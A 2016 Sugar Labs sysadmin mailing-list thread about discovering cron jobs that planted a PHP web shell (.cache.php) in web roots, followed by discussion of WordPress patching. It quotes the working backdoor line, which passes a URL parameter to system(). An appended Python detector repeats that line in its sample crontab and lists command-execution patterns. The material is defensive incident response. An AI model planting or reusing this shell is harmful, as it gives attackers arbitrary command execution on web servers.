[Systems] Found a backdoor

Walter Bender walter.bender at gmail.com
Sun Mar 6 21:41:18 EST 2016


Thanks Samuel. I'll try to populate it this week.

-walter

On Sun, Mar 6, 2016 at 8:02 PM, Samuel Cantero <scanterog at gmail.com> wrote:

> Hi Walter,
>
> I have updated the WP version on your site to the last one (4.4.2). I also
> uploaded the last version of the akismet plugin to the wp plugin folder. In
> theory, you should activate it through the wp admin interface in order to
> make it work again. If you find something broken just let me know.
>
> Best regards,
>
> Samuel C.
>
> On Tue, Mar 1, 2016 at 10:55 PM, Samuel Cantero <scanterog at gmail.com>
> wrote:
>
>> If you want to keep it, I can do the job. I will try to do it this
>> weekend.
>>
>> Best regards,
>>
>> Samuel C.
>>
>> On Tue, Mar 1, 2016 at 10:49 PM, Walter Bender <walter.bender at gmail.com>
>> wrote:
>>
>>> Let's shut it down for the time being. I've been updating the wiki but
>>> not my blog since the attack last year anyway.
>>>
>>> -walter
>>>
>>> On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org>
>>> wrote:
>>>
>>>> +walter
>>>>
>>>> Can we appoint an official maintainer for walterbender.org? Sorry for
>>>> not stepping up myself, but I'm overwhelmed by work related things and
>>>> trying to reduce my sysadmin load.
>>>>
>>>> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
>>>> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
>>>> > <mailto:bernie at codewiz.org>> wrote:
>>>> >
>>>> >     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>>>> >     > Remember in June we had an incident with a broken Wordpress
>>>> site.
>>>> >     > I switched to static generator since then.
>>>> >     >
>>>> >     > +1 on containers just learning more about them and finding them
>>>> fascinating.
>>>> >     > Count me in on containerizing everything.
>>>> >     >
>>>> >     > I'm not aware of other wordpress sites. Maybe walter's blog?
>>>> >     > Wordpress is a PIA IMHO.
>>>> >
>>>> >     Yes, WP is riddled with security holes. Back in October, Samuel helped
>>>> >     Walter upgrade walterbender.org <http://walterbender.org> on
>>>> >     sunjammer. Samuel, can you confirm that the WP instance is now fully
>>>> >     patched and locked down?
>>>> >
>>>> >
>>>> > The WP version on the walterbender.org <http://walterbender.org> site is
>>>> > 4.3.1. The last WP version is 4.4.2. I have checked the WP change log
>>>> > and we can find this:
>>>> >
>>>> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
>>>> > scripting vulnerability that could allow a site to be compromised.
>>>> >
>>>> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
>>>> > security issues: a possible SSRF for certain local URIs, and an open
>>>> > redirection attack.
>>>> >
>>>> > This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
>>>> > Significant information on the release notes:
>>>> >
>>>> >   * Pre-emptive security improvements to ensure that the Akismet plugin
>>>> >     can't be used by attackers to compromise a WordPress installation.
>>>> >   * Closes a potential XSS vulnerability.
>>>> >
>>>> > Of course, every version has a lot of bug fixes. We definitely should
>>>> > upgrade it and test that nothing breaks on the walterbender.org
>>>> > <http://walterbender.org> site.
>>>> >
>>>> > Who is in charge of upgrading the other WP sites?
>>>> >
>>>> > Regards,
>>>> >
>>>> > Samuel C.
>>>> >
>>>> >
>>>> >
>>>> >
>>>> >     > Regards,
>>>> >     > Sebastian
>>>> >     >
>>>> >     >
>>>> >     > On 25/02/16 04:47, Bernie Innocenti wrote:
>>>> >     >> While I was looking for cronjobs in /var/spool/cron/crontabs/, I
>>>> >     >> found that www-data was executing commands like these:
>>>> >     >>
>>>> >     >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>>>> >     >>
>>>> >     >> Did you spot the system()? This executes arbitrary commands
>>>> >     >> specified via the "localtime" url parameter. Uh-oh.
>>>> >     >>
>>>> >     >> There were about a dozen lines like the above, installing
>>>> >     >> .cache.php in various virtualhosts. I kept a copy of the file in
>>>> >     >> /root/www-data.backdoor. The file was last written on Jun 23 2015,
>>>> >     >> which may correlate with the switch to the new website.
>>>> >     >>
>>>> >     >> I cleared the mess and searched the logs for requests containing
>>>> >     >> "localtime", but couldn't find any. I wonder if they could filter
>>>> >     >> the logs, since they were previously writable by www-data.
>>>> >     >>
>>>> >     >> Please watch out. We should ensure directories accessible over
>>>> >     >> http are not writable by user www-data, especially those in which
>>>> >     >> PHP and CGIs are enabled.
>>>> >     >>
>>>> >     >> Running several large sites under the same uid has always been a
>>>> >     >> bad security practice, and looking forward we should keep
>>>> >     >> migrating them to properly isolated containers.
>>>> >     >>
>>>> >     >> Finally, Wordpress is particularly dangerous and we should update
>>>> >     >> and harden all instances. Can someone please take care of this?
>>>> >     >> I'll do Mediawiki, which I know pretty well.
>>>> >     >>
>>>> >     >
>>>> >
>>>> >
>>>> >     --
>>>> >      _ // Bernie Innocenti
>>>> >      \X/  http://codewiz.org
>>>> >     _______________________________________________
>>>> >     Systems mailing list
>>>> >     Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>>>> >     http://lists.sugarlabs.org/listinfo/systems
>>>> >
>>>> >
>>>> >
>>>> >
>>>> >
>>>>
>>>>
>>>> --
>>>>  _ // Bernie Innocenti
>>>>  \X/  http://codewiz.org
>>>>
>>>
>>>
>>>
>>> --
>>> Walter Bender
>>> Sugar Labs
>>> http://www.sugarlabs.org
>>> <http://www.sugarlabs.org>
>>>
>>
>>
>


-- 
Walter Bender
Sugar Labs
http://www.sugarlabs.org
<http://www.sugarlabs.org>
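A defender-side check for the kind of cron entry Bernie describes above, added here as an example and not code from the thread or from Sugar Labs: it scans crontab text for jobs that write inline PHP into a web root, target hidden .php files, call command-execution functions or read request parameters. The sample crontab is constructed (its first entry reproduces the one quoted in the thread), and the web-root prefixes are an assumption.

```python
import re
from typing import Dict, List

# Constructed sample crontab for www-data. The first entry mirrors the one
# quoted in the thread (a cron job that drops a PHP web shell into a
# virtualhost); the second is an ordinary WordPress cron invocation.
SAMPLE_CRONTAB = r"""
*/27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
0 3 * * * /usr/bin/php /srv/www-example/wp-cron.php > /dev/null 2>&1
"""

# Heuristics, not signatures: each describes one property of the backdoor
# found in the thread; a legitimate job rarely has more than one of them.
PHP_TAG = re.compile(r"<\?php", re.IGNORECASE)
DANGEROUS_CALL = re.compile(
    r"@?\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(")
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
# Shell redirection into a .php file below the web roots used on this host
# (the web-root prefixes are an assumption; adjust for your layout).
WRITE_TO_WEBROOT = re.compile(r">>?\s*(/srv/www|/var/www)\S*\.php\b")
HIDDEN_PHP = re.compile(r"/\.[^/\s]*\.php\b")


def analyze_cron_line(line: str) -> List[str]:
    """Return the suspicious properties of one crontab entry (empty if none)."""
    reasons = []
    if PHP_TAG.search(line) and WRITE_TO_WEBROOT.search(line):
        reasons.append("writes inline PHP into a web root")
    if HIDDEN_PHP.search(line):
        reasons.append("target is a hidden .php file")
    if DANGEROUS_CALL.search(line):
        reasons.append("calls a command-execution function")
    if USER_INPUT.search(line):
        reasons.append("reads request parameters")
    return reasons


def analyze_crontab(text: str) -> Dict[str, List[str]]:
    """Map each suspicious entry to its reasons; blanks and comments are skipped."""
    findings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            reasons = analyze_cron_line(line)
            if reasons:
                findings[line] = reasons
    return findings
```

On a real host, feed analyze_crontab() the contents of the www-data crontab (the thread's /var/spool/cron/crontabs/ directory) and review every flagged entry by hand; it is a triage aid, not proof of compromise.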